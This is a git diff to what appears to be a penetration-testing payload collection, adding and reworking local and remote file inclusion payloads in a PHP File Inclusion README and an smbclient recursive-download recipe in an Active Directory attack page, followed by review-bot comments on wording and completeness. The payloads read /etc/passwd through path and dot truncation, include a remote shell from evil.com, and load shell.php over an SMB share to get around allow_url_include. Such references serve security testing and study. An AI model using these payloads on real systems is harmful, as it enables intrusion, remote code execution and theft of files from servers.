diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 1f48d44..3610363 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -9,7 +9,7 @@ * [Basic LFI](#basic-lfi) * [Null byte](#null-byte) * [Double encoding](#double-encoding) - * [Path truncation](#path-truncation) + * [Path and dot truncation](#path-and-dot-truncation) * [Filter bypass tricks](#filter-bypass-tricks) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) @@ -48,14 +48,15 @@ http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 ``` -### Path truncation +### Path and dot truncation On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. ```powershell -http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\. -http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE] -http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd +http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] +http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] +http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] +http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd ``` ### Filter bypass tricks @@ -68,6 +69,8 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C ## Basic RFI +Most of the filter bypasses from LFI section can be reused for RFI. + ```powershell http://example.com/index.php?page=http://evil.com/shell.txt ``` 
@@ -84,6 +87,15 @@ http://example.com/index.php?page=http://evil.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt ``` +### Bypass allow_url_include + +When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. + +1. Create a share open to everyone +2. Write a PHP code inside a file : `shell.php` +3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` + + ## LFI / RFI using wrappers ### Wrapper php://filter @@ -293,3 +305,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) +* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 30de1a2..95f954a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -152,6 +152,17 @@ cd Folder # move inside a folder ls # list files ``` +Download a folder recursively + +```powershell +smbclient //10.0.0.1/Share +smb: \> mask "" +smb: \> recurse ON +smb: \> prompt OFF +smb: \> lcd '/path/to/go/' +smb: \> mget * +``` + Mount a share ```powershell
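Review bot: In the "Path and dot truncation" hunk the explanatory sentence still only describes length truncation ("a filename longer than 4096 bytes will be cut off") and says nothing about the dot variants the renamed heading now advertises, so the three new `............`, `\.\.\.` and `/./././` payloads are unexplained. Add a sentence saying what the trailing dot sequences do and on which platforms/PHP versions each variant applies, and replace the bare `[ADD MORE]` placeholders with the size the padding has to reach (the sentence above already gives the 4096-byte figure). Minor wording: "so any excess chars will be thrown away" reads better as "so any excess characters are discarded".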
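Review bot: The "Basic RFI" hunk is missing an article: "Most of the filter bypasses from LFI section can be reused for RFI." should read "from the LFI section".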
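Review bot: In the "Bypass allow_url_include" hunk the opening is a sentence fragment: "When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible ..." should be one sentence joined with a comma, and "on Windows box" should be "on a Windows box"; step 2 "Write a PHP code inside a file" reads better as "Write PHP code to a file". The description also gives no reason why the `\\10.0.0.1\share\shell.php` UNC path is not subject to those two directives, and a one-line explanation of that (plus an explicit note that this is Windows-only, which the text implies) would make the section self-contained. Style: the hunk adds two blank lines before `## LFI / RFI using wrappers` where the rest of the file uses one.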
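Review bot: The new reference entry in the README references hunk carries the `?m=1` mobile-view query parameter on the URL, which the other entries do not; drop it. The surrounding entries also name an author or date after the title, so the new entry should follow the same format, and the hunk leaves the file without a trailing newline (`\ No newline at end of file`), which should be restored.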
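Review bot: In the Active Directory hunk the heading says "Download a folder recursively" but the `smbclient` block never enters a folder, so `mget *` operates on the share root; add a `cd` step matching the `cd Folder # move inside a folder` line shown in the preceding context. The preceding block also annotates each command with an inline `# ...` comment, while the new `mask ""` / `recurse ON` / `prompt OFF` / `lcd` / `mget *` lines have none; adding the same style of comment (what `mask ""` and `prompt OFF` are for) would keep the two blocks consistent and make the recipe understandable without outside lookup.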